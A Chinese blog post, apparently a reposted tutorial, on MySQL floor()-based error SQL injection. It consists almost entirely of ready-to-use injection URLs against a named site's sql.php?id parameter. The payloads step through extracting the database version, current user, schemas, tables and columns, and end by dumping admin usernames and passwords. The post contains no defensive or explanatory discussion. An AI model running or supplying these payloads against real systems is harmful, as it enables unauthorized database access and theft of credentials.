20、注入篇—————MYSQL数据库Floor报错注入

最新推荐文章于 2024-05-21 20:40:07 发布

FLy_鹏程万里

最新推荐文章于 2024-05-21 20:40:07 发布

阅读量2.3k

点赞数 1

通过Floor爆错

数据库版本

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

链接用户

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

链接数据库

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆库

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆表

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆字段

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆内容

http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

至于floor报错注入在网上有不少的非常不错的文章可以看看，本文也是通过转载的，那就推荐下面这几个吧：

http://www.cnblogs.com/wocalieshenmegui/p/5917967.html

http://www.hackblog.cn/post/36.html

http://www.cnblogs.com/xishaonian/p/6227405.html

FLy_鹏程万里

关注

1
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
20、注入篇—————MYSQL数据库Floor报错注入

通过Floor爆错数据库版本http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)...
复制链接

扫一扫